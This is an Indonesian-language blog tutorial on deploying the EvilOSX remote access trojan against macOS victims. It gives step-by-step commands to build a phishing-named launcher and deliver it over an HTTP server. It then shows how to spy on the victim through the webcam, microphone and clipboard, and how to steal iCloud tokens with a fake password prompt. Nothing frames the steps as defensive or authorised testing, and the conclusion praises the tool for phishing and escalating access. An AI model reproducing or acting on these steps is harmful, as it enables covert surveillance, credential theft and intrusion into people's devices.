Menu Tutup

Cara menggunaka EvilOSX-RAT untuk MacOS / OSX

Pada artikel ini, kita akan belajar menggunakan alat EvilOSX yang merupakan alat Remote Administrator (RAT) untuk menginisialisasi pijakan pada platform seperti MacOS / OSX. Ini secara dramatis dapat meningkatkan akses dalam hitungan detik.

Tutorial EvilOSX-RAT

  • pengantar
  • Instalasi
  • Penggunaan dalam Eksploitasi
  • Penggunaan dalam Pasca Eksploitasi
    • Sistem Informasi
    • Kamera web
    • Ambil token autentikasi iCloud
    • Mikropon
    • Papan klip
  • Kesimpulan

Apa itu EvilOSX-RAT

EvilOSX adalah RAT jahat (Remote Administrator Tool) yang dirancang untuk bekerja pada platform macOS / OSX. Ini dikembangkan oleh Marten4n6. Intinya adalah Proyek Kerangka Kerajaan yang terkenal. Proyek ini dapat dimodifikasi untuk digunakan pada Rubber Ducky. Toolkit ini penuh dengan fitur. Itu dirancang pada sistem modul yang membuat debugging, peningkatan dan penambahan modul lainnya mudah. Juga sedang dikembangkan dalam python menyediakan mudah dijalankan di berbagai platform menyerang.

Instal EvilOSX-RAT

Instalasi RAT EvilOSX pada mesin Attacker, yang dalam kasus kami di Kali Linux cukup sederhana. Untuk memulainya, kita akan mengunjungi Halaman EvilOSX GitHub. Setelah mendapatkan tautan git, kita akan mengkloning EvilOSX ke mesin penyerang kita menggunakan perintah git clone.

git clone https://github.com/Marten4n6/EvilOSX.git

Cara menggunaka EvilOSX-RAT

Setelah mengkloning EvilOSX, kami melintasi direktori yang baru dibuat dengan nama EvilOSX. Sekarang, alat memiliki beberapa persyaratan yang telah ditentukan yang diperlukan untuk membuat alat berfungsi dengan baik. Menjadi alat yang dikembangkan python, kami akan menggunakan “pip” untuk menginstal persyaratan tersebut. Persyaratan ini diberikan oleh penulis dalam bentuk file teks yang kami gunakan untuk menginstalnya.

pip install -r requirements.txt

 

Cara menggunaka EvilOSX-RAT

Penggunaan dalam Eksploitasi

Karena kami telah berhasil menginstal semua persyaratan yang telah ditentukan, sekarang saatnya untuk menjalankan alat ini dan mendapatkan kendali atas beberapa perangkat macOS. Sekarang untuk mengeksploitasi, kita perlu muatan. Untuk membuat payload ini, kami akan menggunakan file start.py dengan parameter builder.

python start.py –builder

Setelah menjalankan skrip, ia meminta kami untuk memasukkan informasi berikut:

  • host Server, di sini kami memasukkan Alamat IP Attacker Machine (Kali Linux).
  • Selanjutnya, ia meminta kami untuk port, ini bisa berupa port acak.
  • Setelah ini, kami ditanyai lokasi muatannya.
  • Selanjutnya, kita harus memilih apakah kita ingin EvilOSX bekerja pada bebek karet atau tidak. Masukkan 0 untuk sebaliknya.
  • Selanjutnya, kita diminta untuk memilih loader, biarkan tetap default.
  • Setelah itu, kami diminta untuk memberi nama payload sehingga phish pengguna.

Cara menggunaka EvilOSX-RAT

Setelah semua pilihan ini, peluncur dibuat seperti yang ditunjukkan pada gambar di bawah ini.

Sekarang kita dapat menggunakan metode apa pun untuk membagikan peluncur ini atau muatan kepada korban. Dalam kasus kami, kami menggunakan server HTTP python untuk mendapatkan file ini ke sistem korban. File ini diunduh pada sistem korban dan kemudian setelah memberikan izin yang tepat, payload dijalankan seperti yang ditunjukkan pada gambar di bawah ini.

chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py

Saat kami menjalankan Peluncur pada korban, kami harus melakukan beberapa tindakan pada mesin penyerang secara bersamaan. Kami akan menjalankan start.py lagi tapi kali ini dalam mode CLI. Di sini kita harus menentukan port yang kita gunakan saat membuat peluncur sebagai parameter seperti yang ditunjukkan pada gambar.

python start.py -cli –port 4545

Cara menggunaka EvilOSX-RAT

Pasca Eksploitasi

Setelah menjalankan skrip start.py pada langkah sebelumnya secara bersamaan dengan peluncur di mesin korban, kami telah berhasil menyusup ke sistem Victim MacOS. Terminal mengkonversi dalam suatu kerangka kerja seperti yang ditunjukkan pada gambar. Kami dapat mengonfigurasi halaman untuk ditampilkan saat berjalan. Ketikkan bantuan untuk menampilkan daftar perintah yang berfungsi. Kita dapat melihat daftar bot aktif dengan menggunakan perintah bot. Untuk membuat koneksi ke bot, gunakan perintah connect diikuti dengan angka yang dalam hal ini adalah 0. Untuk melihat daftar modul yang tersedia, kami menggunakan perintah modul.

Cara menggunaka EvilOSX-RAT

Untuk menggunakan modul, cukup ketik “gunakan” diikuti dengan nama modul. Karena ada banyak modul yang tersedia, kami menunjukkan banyak dari mereka di sini untuk referensi. Anda dapat mencoba semuanya sesuka Anda.

Sistem Informasi

Untuk mendapatkan ringkasan singkat dari sistem, kita dapat menggunakan modul get info. Ini memberi kita Versi Sistem, Model perangkat MacOS. Kami juga mendapatkan status Baterai jika itu adalah Laptop. Kami memiliki nama jaringan Wi-Fi yang terhubung dengannya. Ini juga memberi tahu kita hak istimewa dari akun saat ini serta status FileVault.

Cara menggunaka EvilOSX-RAT

Kamera web

Sekarang, kami akan mencoba mengambil snap dari webcam perangkat MacOS. Untuk melakukan ini kita perlu menggunakan modul webcam. Ini memberi kita peringatan bahwa ada LED hijau akan muncul di dekat kamera.

Cara menggunaka EvilOSX-RAT

Kami telah berhasil mengambil snap dari webcam korban seperti yang ditunjukkan pada gambar yang diberikan.

BACA JUGA  Cara install Arch Linux di Termux android no root

Cara menggunaka EvilOSX-RAT

Ambil token autentikasi iCloud

Kami dapat mengekstrak Otentikasi iCloud yang berisi informasi yang terkait dengan AppleID yang tertaut ke perangkat. Namun, ini pertama kali akan menampilkan prompt pada sistem korban.

Cara menggunaka EvilOSX-RAT

Setelah setuju untuk melanjutkan, prompt akan muncul seperti ditunjukkan pada gambar di bawah ini. Ini menyamar sebagai prompt asli yang akan menipu korban dan membuatnya memasukkan kata sandi.

EvilOSX-RAT

Setelah korban memasukkan kata sandi, kami akan berhasil menangkap ID surat yang disukai perangkat serta token akses seperti yang ditunjukkan pada gambar di bawah ini.

EvilOSX-RAT

Mikropon

Kami juga dapat menangkap audio dari perangkat korban menggunakan modul mikrofon. Setelah menjalankan perintah gunakan mikrofon, kami diminta untuk memasukkan waktu dalam hitungan detik untuk merekam audio dari mikrofon perangkat korban dan juga nama layanan yang akan ditampilkan di konfirmasi verifikasi. 

EvilOSX-RAT

Di sini kami memasukkan 5 detik, dan kami meninggalkan nama layanan untuk dikosongkan yang membuat RAT mengambilnya sebagai string acak seperti yang ditunjukkan pada gambar yang diberikan. Prompt izin muncul pada sistem korban yang meminta izin untuk mengakses mikrofon.

Cara menggunaka EvilOSX-RAT

Setelah memungkinkan kami menyimpan rekaman audio dalam format mp3 yang disimpan di mesin penyerang di direktori tmp.

BACA JUGA  Cara Download iOS 13.4. dengan Benar

Cara menggunaka EvilOSX-RAT

Papan klip

Kami juga dapat mengendus data clipboard dari mesin korban. Untuk melakukan ini kita harus menggunakan clipboard. Ini akan memulai sniffer pada mesin korban untuk waktu yang ditentukan dalam detik. Setelah memulai sniffer, teks apa pun yang akan disalin oleh korban dapat dilihat seperti yang ditunjukkan pada gambar di bawah ini.

EvilOSX-RAT

Kesimpulan

 EvilOSX memiliki banyak kegunaan, dan perhatian terhadap detail dalam mengotomatisasi eksploitasi tertentu menjadikannya alat yang hebat untuk OSX. Kemudahan bekerja dan menyerang sangat luar biasa, kita bisa meluncurkan serangan phishing untuk meningkatkan hak istimewa atau menipu pengguna agar membiarkan kita masuk lebih dalam ke dalam sistem. Ini adalah alat yang hebat dan luar biasa untuk digunakan karena melintasi dirinya sendiri untuk menghubungkan perangkat apel.

Tinggalkan Balasan